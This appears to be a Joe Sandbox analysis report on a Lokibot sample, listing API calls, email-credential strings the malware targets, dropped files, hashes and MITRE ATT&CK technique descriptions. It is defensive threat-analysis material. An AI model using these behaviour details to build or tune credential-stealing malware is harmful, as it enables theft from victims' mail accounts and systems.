Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

PopPort, xrefs: 0040D0A7
SmtpServer, xrefs: 0040D0DC
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpPort, xrefs: 0040D0EB
PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
SmtpAccount, xrefs: 0040D0FA
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorLast
String ID: IDA$IDA
API String ID: 887189805-2020647798
Opcode ID: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: d1a4e7134676979b6b57f8278ca938aa0c19887f4db682e2a4dd920a4280672c
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_iWEWjTXiqXke.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 3e5dcc4db61406608786f9b0aa712dad600a8c5e5b05f0ce84802de4921d3fb8
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kzQ25HVUbf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iWEWjTXiqXke.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kzQ25HVUbf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cilvf3zm.ed5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbhljqab.uf5.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_immu0q43.5fw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcqiuy2s.fsl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0xzud54.e24.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_udkaewyu.k0p.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5laeug2.qrh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb055wb2.k3r.psm1

C:\Users\user\AppData\Local\Temp\tmp53FD.tmp

C:\Users\user\AppData\Local\Temp\tmp851F.tmp

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Windows Analysis Report
kzQ25HVUbf.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre